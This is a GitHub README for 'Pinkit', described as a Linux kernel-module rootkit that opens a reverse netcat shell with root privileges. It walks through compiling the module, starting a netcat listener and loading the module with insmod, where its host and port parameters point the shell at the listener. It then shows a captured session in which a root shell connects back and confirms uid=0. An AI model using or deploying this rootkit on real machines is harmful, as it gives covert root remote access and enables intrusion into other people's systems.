-
Notifications
You must be signed in to change notification settings - Fork 18
/
README.TXT
33 lines (28 loc) · 984 Bytes
/
README.TXT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# Pinkit
A quick LKM rootkit that executes a reverse netcat shell with root privileges.
INSTALL
[Dependencies]
apt install build-essential linux-headers-$(uname -r)
[Compile Kernel Module]
cd Pinkit; make
[Execute Reverse Shell]
# nc must be installed
nc -lvp 1339 <- Run netcat listener in another shell
[Insert and remove LKM]
[root@Dev Pinkit]# insmod pinkit.ko host="REV_TCP_LH=127.0.0.1" port="REV_TCP_LP=1339"
[root@Dev Pinkit]# cat /proc/modules |grep pink
pinkit 16384 0 - Live 0xffffffffc0aa6000 (PO)
[root@Dev Pinkit]# rmmod pinkit
[Once LKM is loaded shell will connect to nc listener]
[ra_horakhty][Dev][Pinkit]
-> ncat -lvp 1339
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::1339
Ncat: Listening on 0.0.0.0:1339
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:41060.
sh: cannot set terminal process group (-1): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4# id
id
uid=0(root) gid=0(root) groups=0(root)